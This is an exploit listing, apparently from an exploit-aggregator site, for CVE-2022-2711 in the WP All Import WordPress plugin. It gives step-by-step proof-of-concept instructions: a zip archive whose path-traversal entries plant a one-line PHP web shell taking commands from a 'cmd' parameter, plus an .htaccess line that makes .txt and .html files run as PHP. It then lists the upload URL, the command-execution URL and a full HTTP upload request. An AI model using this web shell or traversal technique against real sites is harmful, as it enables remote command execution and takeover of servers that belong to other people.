Exploit for WP All Import < 3.6.9 - Admin+ Directory traversal via file upload CVE-2022-2711

Name: Exploit for WP All Import < 3.6.9 - Admin+ Directory traversal via file upload CVE-2022-2711
Rating: 5 (61 reviews)
2022-10-14 | CVSS 0.7
## https://sploitus.com/exploit?id=WPEX-ID:11E73C23-FF5F-42E5-A4B0-0971652DCEA1
[1] Download 'poc.zip' via 'https://github.com/lucy-official/TIL/raw/main/Security/Test%20Files/Zipslip/poc.zip'

 poc.zip contains 2 files like below
 -> '../../../../../../../../../../var/www/html/exploit.php.txt'
 -> '../../../../../../../../var/www/html/.htaccess'

 [1-1] '../../../../../../../../../../var/www/html/exploit.php.txt' is as follows.
 ----------------------------------
 <?php system($_GET['cmd']); ?>
 ----------------------------------

 [1-2] '../../../../../../../../var/www/html/.htaccess' is as follows.
 ----------------------------------
 <IfModule mod_rewrite.c>
 [same as the existing .htaccess data]
 AddHandler application/x-httpd-php .php .html
 </IfModule>
 ----------------------------------

[2] Upload the 'poc.zip' via the button [Upload a file] on 'http://localhost/wp-admin/admin.php?page=pmxi-admin-import'

[3] Access 'http://localhost/exploit.php.txt?cmd=id' in order to execute arbitrary commands.


[+++] PoC Request Packet Sample
POST /wp-admin/admin.php?page=pmxi-admin-settings&action=upload&_wpnonce=afb6fb6e5c HTTP/1.1
Host: localhost
Content-Length: 1333
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryrhApgY7BhUu88AGu
Accept: */*
Origin: http://localhost
Referer: http://localhost/wp-admin/admin.php?page=pmxi-admin-import
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: [wordpress-admin-cookie]
Connection: close

------WebKitFormBoundaryrhApgY7BhUu88AGu
Content-Disposition: form-data; name="name"

poc.zip
------WebKitFormBoundaryrhApgY7BhUu88AGu
Content-Disposition: form-data; name="chunk"

0
------WebKitFormBoundaryrhApgY7BhUu88AGu
Content-Disposition: form-data; name="chunks"

1
------WebKitFormBoundaryrhApgY7BhUu88AGu
Content-Disposition: form-data; name="async-upload"; filename="poc.zip"
Content-Type: application/zip

[poc.zip payload]
[ - you can download it via 'https://github.com/lucy-official/TIL/raw/main/Security/Test%20Files/Zipslip/poc.zip']
------WebKitFormBoundaryrhApgY7BhUu88AGu--